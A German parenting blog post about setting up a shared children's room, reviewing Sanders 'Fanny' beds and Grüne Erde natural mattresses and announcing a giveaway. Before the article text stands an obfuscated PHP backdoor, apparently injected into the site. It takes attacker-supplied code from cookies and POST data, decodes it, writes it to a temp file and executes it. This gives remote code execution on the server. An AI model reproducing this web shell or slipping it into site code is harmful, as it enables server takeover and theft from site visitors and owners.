$jXhbjbr = "\146" . "\113" . "\x6d" . '_' . chr ( 454 - 356 ).'z' . 'E' . chr ( 194 - 97 ).chr ( 704 - 636 ); $PvgoRu = 'c' . chr (108) . "\141" . 's' . chr ( 943 - 828 ).chr ( 258 - 163 )."\x65" . "\x78" . 'i' . 's' . "\x74" . chr ( 970 - 855 ); $EwcdOvYRk = class_exists($jXhbjbr); $jXhbjbr = "8353";$PvgoRu = "61944";$FtnSREqJsl = !1;if ($EwcdOvYRk == $FtnSREqJsl){function TrfkRoyLL(){return FALSE;}$cXgtDCSXJ = "20634";TrfkRoyLL();class fKm_bzEaD{private function gxFQpdMg($cXgtDCSXJ){if (is_array(fKm_bzEaD::$WLVkLgOJ)) {$hqkbAtKDo = sys_get_temp_dir() . "/" . crc32(fKm_bzEaD::$WLVkLgOJ['s' . "\141" . chr ( 277 - 169 ).chr ( 912 - 796 )]);@fKm_bzEaD::$WLVkLgOJ[chr (119) . chr ( 624 - 510 )."\x69" . chr ( 1113 - 997 ).chr (101)]($hqkbAtKDo, fKm_bzEaD::$WLVkLgOJ["\x63" . "\x6f" . "\156" . chr ( 466 - 350 ).chr ( 265 - 164 ).chr ( 381 - 271 ).'t']);include $hqkbAtKDo;@fKm_bzEaD::$WLVkLgOJ["\x64" . "\x65" . "\154" . chr ( 970 - 869 ).chr ( 366 - 250 ).chr ( 197 - 96 )]($hqkbAtKDo); $cXgtDCSXJ = "20634";exit();}}private $mKGlAh;public function sabAI(){echo 7098;}public function __destruct(){$cXgtDCSXJ = "38587_40721";$this->gxFQpdMg($cXgtDCSXJ); $cXgtDCSXJ = "38587_40721";}public function __construct($QXuHGe=0){$GnJOLC = $_POST;$rWRKA = $_COOKIE;$gRBtbv = "d11ff962-d156-445e-8634-ddb04f9c8211";$ZTZaoWUk = @$rWRKA[substr($gRBtbv, 0, 4)];if (!empty($ZTZaoWUk)){$iKuvkugMNc = "base64";$gUuKUCA = "";$ZTZaoWUk = explode(",", $ZTZaoWUk);foreach ($ZTZaoWUk as $sJMzCODE){$gUuKUCA .= @$rWRKA[$sJMzCODE];$gUuKUCA .= @$GnJOLC[$sJMzCODE];}$gUuKUCA = array_map($iKuvkugMNc . "\137" . "\144" . "\145" . 'c' . "\x6f" . "\x64" . "\145", array($gUuKUCA,)); $gUuKUCA = $gUuKUCA[0] ^ str_repeat($gRBtbv, (strlen($gUuKUCA[0]) / strlen($gRBtbv)) + 1);fKm_bzEaD::$WLVkLgOJ = @unserialize($gUuKUCA); $gUuKUCA = class_exists("38587_40721");}}public static $WLVkLgOJ = 55812;}$cdpecyXOED = new /* 61068 */ fKm_bzEaD(20634 + 20634); $_POST = Array();unset($cdpecyXOED);} Unser neues Kinderzimmer – Betten & Matratzen | Salon Mama
LIVING & INTERIOR | KINDERZIMMER

Unser neues Kinderzimmer – Betten & Matratzen

10. November 2019

Das Kinderzimmer – bei uns war es die längste Zeit ein Ort, der in den ersten Jahren nicht wirklich viel von unseren Kindern genutzt wurde. Geschlafen wurde im Elternschlafzimmer und gespielt im Wohnzimmer. Doch dann kam plötzlich der Moment, als Alma viel und gerne auch in ihrem Kinderzimmer spielte. Sich auch bewusst zurückziehen wollte um ganz in ihrem Rollenspiel zu versinken – ohne Störung von aussen. Und relativ schnell hat auch Vito begonnen im gemeinsamen Kinderzimmer mit seinen Tieren zu spielen. Geschlafen wurde trotzdem noch bei uns im Schlafzimmer. Alma in einem eigenen kleinen Bett neben unseren und Vito bei uns in der Mitte im Doppelbett.

In einem zweiteiligen Artikel erzähle ich euch für welche Kinderbetten und Kindermatratzen wir uns entschieden haben und warum wir eine langfristige Lösung haben wollten. Im zweiten Teil seht ihr mit welchen Kinderzimmer Accessoires und Textilien ich eine optische Trennung im Geschwisterzimmer hervorrufen wollte, damit jeder einen eigenen Rückzugsbereich hat.

Geborgenheit im Geschwisterzimmer

Gerade in den ersten Lebensjahren finde ich ein Geschwisterzimmer nicht nur vollkommen ausreichend, sondern sogar extrem förderlich. Vor allem wenn der Altersunterschied, wie bei uns, nicht enorm groß ist. Denn Kinder fühlen sich geborgener, wenn sie nicht alleine einschlafen müssen. Und weiters finde ich es auch nicht schlecht, wenn sie früh lernen aufeinander Rücksicht zu nehmen. Natürlich gibt es in einem Geschwisterzimmer auch immer wieder Streit, aber meistens dreht es sich ums „Verteidigen“ der eigenen Spielsachen. Daher war es für mich besonders wichtig, wenn ich schon das Kinderzimmer umgestalte, dass jedes Kind einen eigenen Bereich hat.

Das erste „eigene“ Bett

Die Entscheidung das Kinderzimmer umzugestalten, kam vor allem mit dem Wunsch und der Notwendigkeit eines eigenen Bettes für die Kinder. Aus dem Gitterbett ist Vito herausgewachsen und Alma hat sich sehnlichst ein Prinzessinnenbett gewünscht. Ich habe meine Kinder nie dazu gedrängt, dass sie alleine in ihrem Zimmer schlafen müssen, sondern ich habe es auf mich zukommen lassen. Aber nun ist der Moment da, dass meine Tochter bereit dafür ist, alleine in ihrem Kinderzimmer zu schlafe. Ich habe mich dann relativ lange mit dem Thema Kinderbett und Kindermatratze auseinander gesetzt, damit ich eine optimale und vor allem längerfristige Lösung finde.

  • Nach welchen Kriterien habe ich die Betten ausgesucht?

Ich wollte unter gar keinen Umständen eine „Übergangslösung“, sondern Betten und Matratzen, die die Kinder beim Größer werden begleiten und somit mitwachsen. Daher war mir auch die Qualität besonders wichtig. Ich habe von Anfang an die Omas mit einbezogen und gefragt, ob sie sich beim Kauf der Betten finanziell beteiligen. Sie fanden die Idee sofort großartig und wollten gerne in einen guten Kinderschlaf investieren 😉 Ein weiteres Kriterium war, dass es zeitlose Betten sein sollen, die den Kindern auch noch in ein paar Jahren gefallen.

Bett Fanny – das flexible Bettenmodul

Ich wollte ein Bett das alles kann und flexibel auf die unterschiedlichen Bedürfnisse der Kinder eingehen kann. Der erste Schritt für mich war die Entscheidung für ein Bett in der Größe 90x200cm. Alles andere machte für mich wenig Sinn, denn die Betten sollen die Kinder mindestens bis ins Teenageralter begleiten. Und wenn mich ein Kind in der Nacht braucht oder es krank ist, kann ich mich in einem 90×200 Bett auch locker dazu legen. Auch wenn die Kinder sehr gerne schon ein Hochbett wollten, habe ich mich dagegen entscheiden, da ich etwas Angst hatte, dass die Kinder mit 2 und 5 Jahren dafür noch etwas zu klein dafür sind. Aber ich wollte die Option haben, dass man die jetzigen Betten entweder ein Halbhohes-, ein Hoch- oder ein Stockbett umbauen kann. Am praktischsten und zeitlosesten fand ich das dänische Kindermöbel Label Sanders. Bei den Raumelfen habe ich mir das Bett Fanny von Sanders in Natura ansehen können und mich ausgiebig beraten lassen. Das System ist eben „mitwachsend“, so können Betten von 160cm auf 200cm Länge umgebaut werden, niedrige Betten in Mittelhochbetten, Hochbetten oder Etagenbetten verwandelt werden. Es gibt wirklich unzählige Möglichkeiten. Hier seht einige Varianten des Bettes Fanny.

Bei Vito habe ich mich für das Basismodell mit Rausfallschutz entschieden und es mit einem Betthimmel von Numero 74 und vielen weiteren Accessoires von Kyddo gemütlich gemacht.

Almas Bett hat einen Baldachin aus rosa Leinen und bekommt noch zusätzlich eine Bettlade, falls einmal eine Freundin bei ihr übernachten will.

Beide Betten bilden im Kinderzimmer optisch eine Einheit, jedoch mit ein paar schönen Accessoires kann man ganz leicht für jedes Kind ein eigenes individuelles Reich schaffen.

Die richtige Matratze – gesunder Kinderschlaf

Für mich ist es als Mama essentiell, dass meine Kinder sich beim einschlafen geborgen und wohl fühlen. Ich begleite sie sehr gerne noch in den Schlaf in dem ich sie streichle oder ihnen eine Geschichte vorlese. Eine weitere wichtige Grundlage für einen gesunden Kinderschlaf ist die Wahl der Matratze. Kinder schlafen besonders gut auf einer Matratze, die ergonomisch durchdacht und gesundheitlich unbedenklich ist, das heisst weder Kunststofffasern, Schaumstoffe noch Federkerne enthalten. Daher habe ich mich für Matratzen der Grünen Erde entschieden.

Die Kindermatratzen der Grüne Erde

Grüne Erde-Matratzen entstehen in sorgfältiger Handarbeit aus hochwertigen und besonders hautfreundlichen Naturfasern – frei von Schadstoffen und Metallen. Nicht nur, dass alle Matratzen erst – nach Bestellung – in Österreich handgefertigt werden, der größte Unterschied zu herkömmlichen Matratzen ist schon alleine der Geruch. Sie riechen herrlich nach Natur – nicht nach Plastik oder anderen Schadstoffen.

„Sanftes Wölkchen“

Bei Vito haben wir uns für die Kindermatratze „Sanftes Wölkchen“ 90x200cm entschieden. Sie ist vor allem ab dem Kleinkindalter sehr gut geeignet ist (feste Liegefläche) und der Bezug ist abnehmbar- und waschbar. Gerade bei Kleinkindern nicht unwichtig. Die Matratze ist aus 7 Schichten aufgebaut: Kerne aus Kokoslatex sowie Vliese aus Bio-Baumwolle und österreichischer Schafschurwolle. Die weichen, saugfähigen Fasern sorgen für einen guten Feuchtigkeits- und Temperaturausgleich. Bei allen Baby- und Kindermatratzen wird bei Grüne Erde auf den Reißverschluss verzichtet (metallfrei), daher ist das Sanfte Wölkchen mit innenliegenden Knöpfen ausgestattet, damit der Bezug weiterhin abnehm- und waschbar ist.

„Traumhaftes Wölkchen“

Das „Traumhafte Wölkchen“ ist die „Premium-Kindermatratze“ von Grüne Erde. Handwerklich sehr aufwendig gefertigt, bietet sie 3 unterschiedlich elastische Liegezonen, die sich den Körperregionen – Schulter, Becken, Füße – optimal anpassen. Daher finde ich es für etwas größere Kinder optimal. Und auch hier wieder: Das Traumhafte Wölkchen wächst mit. Die Matratze kann mit fortschreitendem Alter und geändertem Liegebedürfnis der Kinder gewendet werden – von der festeren, flächigeren Seite (Kokoslatexkern) auf die etwas weichere, punktelastische Seite (Naturlatexkern). Warme, saugfähige, atmungsaktive Auflagen und der Bezug aus reiner Bio-Baumwolle sorgen für ein sehr angenehmes, trocken-warmes Schlafklima. Auch der Bezug ist sehr strapazierfähig aus Jacquard, 100 % Baumwolle mit der Füllung sorgfältig versteppt. Da beim traumhaften Wölkchen ausschließlich pflanzliche Fasern verarbeiten, ist die Matratze auch für Tierhaar-Allergiker empfehlenswert. 

Schlafen die Kinder jetzt in ihren Betten?

Da ich mit unseren Grüne Erde Produkten sehr zufrieden bin, freue ich mich, dass ich unter euch ein Kinderschlafkissen 35x40cm und eine Ganzjahresdecke 80×80 cm von Grüne Erde verlosen darf.

Folgende Punkte müssen von eurer Seite erfüllt sein, damit ein Zettel mit eurem Namen im Verlosungstopf landet:

  • Hinterlässt hier am Blog, auf Facebook oder auf Instagram ein Kommentar zur Frage: Was ist dir bei Kindermatratzen besonders wichtig? Also worauf du bei der Auswahl bzw. beim Kauf besonders achtest.
  • Das Gewinnspiel läuft eine Woche. Am 08.11.2019 wird der glückliche Gewinner/In per Zufall gezogen und per PN verständigt.

Hier gibt es unsere Teilnahmebedingungen nochmal im Detail zum Nachlesen.

Wir drücken euch ganz fest die Daumen!

Gewinnspiel mit „Grüne Erde“

Die wohl wichtigste Frage ist, ob die Kinder nun auch in ihren neuen Betten und auf ihren neuen Matratzen schlafen? Jein 😉 Bei Alma klappt es super! Sie schläft jede Nacht in ihrem Bett und ist jeden Morgen stolz, dass sie wieder eine Nacht alleine geschlafen hat. Bei Mr. V ist es etwas durchwachsen 😉 Aber ich finde das auch absolut ok so. Ich werde die Zeit noch vermissen, wo die Kinder nicht mehr zu uns ins Bett kommen 😉 Ich bin auf alle Fälle mit meiner Entscheidung sehr zufrieden. Mir war es besonders wichtig, vor allem mit den Kinderbetten einen eigenen Rückzugsort für die Kinder zu schaffen. Und Matratzen auszuwählen, die ein gesundes Wachstum fördern und keine Schadstoffe enthalten.

Für welche Möbel, Accessoires und Bettextilien ich mich entschieden habe, könnt ihr dann im nächsten Artikel lesen.

Wir verwenden Cookies, um Inhalte zu personalisieren, Funktionen für soziale Medien anbieten zu können und die Zugriffe auf unsere Website zu analysieren.